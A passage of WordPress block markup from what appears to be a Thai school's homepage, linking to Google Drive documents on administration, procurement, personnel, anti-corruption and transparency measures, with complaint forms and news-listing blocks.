data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container 